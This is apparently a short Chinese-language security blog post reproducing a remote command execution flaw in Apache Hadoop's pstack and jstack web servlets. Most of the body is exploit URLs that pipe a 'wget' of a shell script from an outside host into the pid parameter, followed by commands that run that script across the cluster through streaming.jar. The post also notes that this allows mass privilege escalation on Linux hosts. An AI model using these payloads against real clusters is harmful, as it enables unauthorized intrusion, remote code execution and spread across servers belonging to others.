Apache Hadoop 远程命令执行

·
漏洞复现 no tag August 17, 2020

通过hadoop,hbase,hdfs0.2 RC版本的管理web端能远程执行命令,通过该节点对集群服务器进行任务分发(该是基本功能,当然可以进行批量提权linux主机)渗透进hadoop集群。原因是 jstack pstack servlet 执行命令.

远程执行命令
http://hadoop_host:50060/pstack?pid=123|wget http://somehost/shell.sh
http://hadoop_host:50060/jstack?pid=123|wget http://somehost/shell.sh

进行任务分发,批量对集群进行命令执行
http://hadoop_host/pstack?pid=123|home/work/hadoop/streaming.jar /home/shell.sh
http://hadoop_host/jstack?pid=123|home/work/hadoop/streaming.jar /home/shell.sh

  • 内网渗透1-基础信息搜集
  • 一条命令查看win机器是否装杀毒软件
_(:3 」∠)_
(抱歉)
这里不能评论哦

© 2020 OnionT's Blog. .